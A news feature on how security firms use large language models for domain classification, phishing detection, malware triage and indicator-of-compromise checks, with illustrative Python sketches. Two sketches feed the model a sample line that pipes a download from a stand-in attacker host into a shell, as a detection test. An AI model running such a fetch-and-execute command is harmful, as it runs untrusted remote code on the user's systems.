How defenders are experimenting with artificial intelligence

AI dominated conversations at the RSA Security Conference in April, but underneath the hype, some real changes are in the works.

When cybersecurity firm Sophos wanted to find ways to expand its use of machine learning and artificial intelligence models in its cybersecurity workflow and products, the company turned to large language models, or LLMs.

Experiments with the classification of web domains, for example, found that a version of the generative pre-trained transformer GPT-3 (the basis for ChatGPT) could effectively classify domains and teach smaller, more cost-efficient LLMs to do a better job on the task as well, the company said in a research paper released in May. Sophos also found a more efficient transformer-based model for natural language processing that could detect malicious sentiment in phishing emails and business email compromise attacks, with detection rates of 82% and 90%, respectively, at a 0.1% false positive rate.
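As a rough illustration of that pattern, not Sophos's actual prompt, category set, or models, the sketch below asks a general-purpose LLM to assign a single category to a web domain; labels gathered this way could later serve as training data for a smaller student model. It assumes the official openai Python package and an OPENAI_API_KEY in the environment.

```python
# Hypothetical sketch of LLM-assisted domain classification; the categories,
# prompt, and model choice are illustrative assumptions, not Sophos's setup.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

CATEGORIES = ["phishing", "malware", "gambling", "news", "benign"]  # made-up label set

def classify_domain(domain: str) -> str:
    """Ask the model to assign exactly one category label to a web domain."""
    prompt = (
        "Classify the following web domain into exactly one of these categories: "
        f"{', '.join(CATEGORIES)}.\n"
        f"Domain: {domain}\n"
        "Answer with the category name only."
    )
    response = client.chat.completions.create(
        model="gpt-3.5-turbo",  # stand-in model; Sophos's paper worked with GPT-3 variants
        messages=[{"role": "user", "content": prompt}],
        temperature=0,          # keep labels as stable as possible for reuse as training data
    )
    return response.choices[0].message.content.strip().lower()

if __name__ == "__main__":
    print(classify_domain("example-login-verify.com"))
```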

These advances highlight the ways AI is set to change cybersecurity, essentially by simulating and augmenting cybersecurity analysts’ workflow and intuition, Sophos president and chief technology officer Joe Levy told README.

“It’s clearly exhibiting a set of valuable capabilities in expressing a sort of intelligence when reasoning with cybersecurity problems now,” Levy said. “We’re seeing clear indications that it’s beginning to demonstrate intuitions that will allow it to, not necessarily replace the human analyst, but certainly to augment human analysts.”

Sophos is not alone. In the months since the launch of ChatGPT, the ability of LLMs to synthesize human-sounding prose and recall an immense amount of information culled from the internet has propelled the technology to the forefront of the internet zeitgeist.

Security companies inundated the RSA Security Conference in April with product descriptions that included some mention of features derived from ChatGPT or other generative pre-trained transformer (GPT) models. Ratings firm SecurityScorecard launched a new version of its platform that integrates GPT-4-powered search, for example, while Veracode unveiled Veracode Fix, which uses a GPT model to suggest code changes that fix security issues. Both CrowdStrike and Microsoft have launched AI-based assistants, Charlotte and Copilot, respectively, to help triage potential threats in security operations centers.

In some ways, companies are behind in the race to adopt AI: Security professionals have already warned that attackers are finding ways to use GPT chatbots to create more convincing phishing emails and improve other fraud schemes. The industry’s rush to experiment with LLMs, however, shows that defenders are going to benefit from intelligent automation as well.

Time-saving automation

A big focus is on making security professionals more efficient. Companies have integrated AI models for security into their products, often with an eye on saving time for already-overworked analysts, developers, and administrators.

Software services firm GitLab, for example, uses LLMs to explain vulnerabilities and help generate automated tests for security issues. Kaspersky relies heavily on machine-learning technologies to aid its security professionals, too. Of the 433,000 security events processed by the company's managed detection and response service, a third were classified by the company's machine-learning systems, while 292,000 events were vetted by security analysts.

Photo: Alexander Sinn / Unsplash

The time savings are not limited to the primary task, such as code generation or malware classification, but extend throughout the workflow. Software supply-chain security firm Endor Labs has experimented with using GPT-3.5 to identify malware artifacts in open-source packages, finding that the LLM could explain what the code does but had trouble determining whether a function is malicious. While the current technology, which is not even trained specifically on code, is wrong about as often as it is right, the company will continue to use it in parallel in its pipeline, Henrik Plate, a security researcher with Endor Labs, told README.
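The snippet below is a minimal sketch of that kind of query, not Endor Labs' pipeline: it sends a code artifact to GPT-3.5 and asks for a verdict plus an explanation. The prompt wording and JSON response format are invented for illustration, and it assumes the openai Python package with an API key in the environment.

```python
# Hypothetical code-triage query; the prompt and response schema are assumptions.
import json
from openai import OpenAI

client = OpenAI()

def triage_snippet(source_code: str) -> dict:
    """Ask GPT-3.5 whether a code artifact looks malicious and why."""
    prompt = (
        "You are reviewing a code artifact from an open-source package.\n"
        'Reply with JSON of the form {"verdict": "malicious|benign|unsure", "explanation": "..."}.\n\n'
        "Code:\n" + source_code
    )
    response = client.chat.completions.create(
        model="gpt-3.5-turbo",
        messages=[{"role": "user", "content": prompt}],
        temperature=0,
    )
    # The model may still return malformed JSON; a real pipeline would validate this.
    return json.loads(response.choices[0].message.content)

if __name__ == "__main__":
    snippet = "import os\nos.system('curl http://attacker.example/payload | sh')"
    print(triage_snippet(snippet))
```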

“When it’s accurate and I need to create a report, I can just take the explanation of what the malicious code does and copy it into my email, which saves me a lot of time,” he said.

Don’t trust, always verify

The danger in generative AI lies in the Eliza effect, the psychological tendency of a person interacting with a conversational machine-learning program to believe that it responds, or reasons, the same way a human does. As a result, people tend to be surprised when a small change to the input produces a completely different output from an LLM.

In its experiments using ChatGPT to classify indicators of compromise (IOCs) on hosts, Kaspersky found that the LLM could identify the traces of common tools like Mimikatz and Fast Reverse Proxy, but failed to identify an indicator for WannaCry and flagged a legitimate component, lsass.exe, as malicious. Overall, the method highlighted 74 security events, but with a 20% false positive rate.
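A rough approximation of that experiment, with invented artifacts, prompt, and model choice rather than Kaspersky's actual tooling, might look like the following; every verdict still needs analyst review, given the false positives described above.

```python
# Illustrative only: asking an LLM whether host artifacts look like indicators
# of compromise. Artifacts, prompt, and model are made-up examples.
from openai import OpenAI

client = OpenAI()

HOST_ARTIFACTS = [  # hypothetical findings collected from an endpoint
    r"running process: C:\Windows\System32\lsass.exe",
    r"running process: C:\Users\Public\mimikatz.exe",
    r"service binary frpc.exe listening on 0.0.0.0:7000",
]

def assess_artifact(artifact: str) -> str:
    prompt = (
        "Does the following artifact from a Windows host look like an indicator "
        "of compromise? Answer 'suspicious' or 'benign', then give one sentence of reasoning.\n"
        + artifact
    )
    response = client.chat.completions.create(
        model="gpt-3.5-turbo",
        messages=[{"role": "user", "content": prompt}],
        temperature=0,
    )
    return response.choices[0].message.content.strip()

for artifact in HOST_ARTIFACTS:
    # Kaspersky saw legitimate components like lsass.exe flagged and real
    # indicators missed, so these verdicts are leads, not conclusions.
    print(artifact, "->", assess_artifact(artifact))
```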

“Beware of false positives and false negatives that this can produce,” Victor Sergeev, incident response team lead at Kaspersky, said in the analysis. “At the end of the day, this is just another statistical neural network prone to producing unexpected results.”

In its experiment with malicious code classification, Endor Labs queried GPT-3.5 with 1,874 code artifacts, asking it to determine if the code was malicious and to explain why or why not. Sometimes small changes in the input led to dramatic changes in the output, with no clear reason. Just adding a certain comment, such as “this is image manipulation function,” could flip the assessment, Endor Labs’ Plate told README.
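One simple guardrail that follows from that observation is a consistency check: classify the same artifact with and without an innocuous perturbation, such as an added comment, and escalate to a human whenever the verdicts disagree. The helper and prompt below are hypothetical, not Endor Labs' code.

```python
# Hedged sketch of a perturbation/consistency check; prompt and model are assumptions.
from openai import OpenAI

client = OpenAI()

def verdict(source_code: str) -> str:
    """Return a one-word malicious/benign/unsure verdict for a code snippet."""
    response = client.chat.completions.create(
        model="gpt-3.5-turbo",
        messages=[{
            "role": "user",
            "content": "Is this code malicious? Answer with one word: "
                       "malicious, benign, or unsure.\n\nCode:\n" + source_code,
        }],
        temperature=0,
    )
    return response.choices[0].message.content.strip().lower()

snippet = "import os\nos.system('curl http://attacker.example/p | sh')"
perturbed = "# this is image manipulation function\n" + snippet  # the comment cited above

original_verdict, perturbed_verdict = verdict(snippet), verdict(perturbed)
if original_verdict != perturbed_verdict:
    # An unstable verdict is itself a signal that an analyst should review the artifact.
    print(f"inconsistent verdicts: {original_verdict!r} vs {perturbed_verdict!r} -- escalate")
```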

The lesson is that anyone who uses AI should be able to check its results, he said.

“When I use it, no matter for malware assessment or for developing myself, I only let it produce things that I can verify myself, so I can check the thing that it produces,” Plate said. “So for example, I wouldn’t let it summarize a book, because there’s no way I can check in a short amount of time whether the book summary is in any way accurate or totally made up.”

Beware the downsides

Companies should enthusiastically experiment, but be equally cognizant of the potential pitfalls of current LLMs, experts say.

Cost is one major downside. LLMs are not only expensive to train, but also expensive to run. Current estimates put the cost of running a ChatGPT-type LLM at roughly 0.3 to 1.0 cents per query, which might not seem like much but quickly adds up for large-scale tasks such as requesting an inference for every domain visited by the average user. Scanning hosts for indicators of compromise this way costs between $15 and $25 per machine, according to Kaspersky.
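Some back-of-the-envelope math shows how quickly those per-query costs compound; the unit costs below come from the estimates above, while the query volumes are assumptions picked purely for illustration.

```python
# Rough cost arithmetic; fleet size and browsing volume are made-up assumptions.
COST_PER_QUERY_USD = (0.003, 0.010)   # 0.3 to 1.0 cents per query, as cited above
DOMAINS_PER_USER_PER_DAY = 100        # assumed browsing volume
USERS = 10_000                        # assumed fleet size

daily_queries = DOMAINS_PER_USER_PER_DAY * USERS
low, high = (daily_queries * cost for cost in COST_PER_QUERY_USD)
print(f"classifying every visited domain: ${low:,.0f} to ${high:,.0f} per day")

# Kaspersky's per-host IOC-scanning estimate, applied to the same assumed fleet:
print(f"one IOC sweep across the fleet: ${15 * USERS:,} to ${25 * USERS:,}")
```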

Yet these systems can be optimized. Sophos found that the general GPT-3 Babbage model, which requires the processing of 3 billion parameters for each decision, costs too much to classify URLs in a production setting, but using larger LLMs to train stripped-down “student” models that were 175 times smaller cut costs substantially without a significant dip in accuracy, the company said in its research paper.
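That teacher-student idea can be sketched with a toy example: a small, cheap classifier trained on labels that a large LLM produced. The data, features, and model below are illustrative stand-ins rather than Sophos's architecture, and the sketch assumes scikit-learn is installed.

```python
# Toy distillation sketch: a tiny "student" trained on teacher-provided labels.
# Everything here (data, features, model) is illustrative, not Sophos's setup.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Domains with labels assumed to have come from the large teacher LLM.
teacher_labeled = [
    ("secure-login-paypa1.com", "phishing"),
    ("update-invoice-docs.net", "phishing"),
    ("news.example.org", "benign"),
    ("weather.example.com", "benign"),
]
domains, labels = zip(*teacher_labeled)

# Character n-grams are a common, cheap feature choice for domains and URLs.
student = make_pipeline(
    TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5)),
    LogisticRegression(max_iter=1000),
)
student.fit(domains, labels)

# The student runs locally at a fraction of the cost of querying the teacher.
print(student.predict(["verify-account-paypa1.net"]))
```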

In the end, AI looks ready to help reduce the deluge of data that human analysts must face on a daily basis. Yet, the human part of the equation will remain critical, so companies should proceed with diligence, Kaspersky’s Sergeev told README.

“AI tools like ChatGPT can assist in certain types of tasks, but they cannot completely replace the expertise and judgment of humans,” he said. “Integration of AI assistants into everyday routine should not be too fast and … require[s] special education, such as explaining AI’s possibilities and limitations.”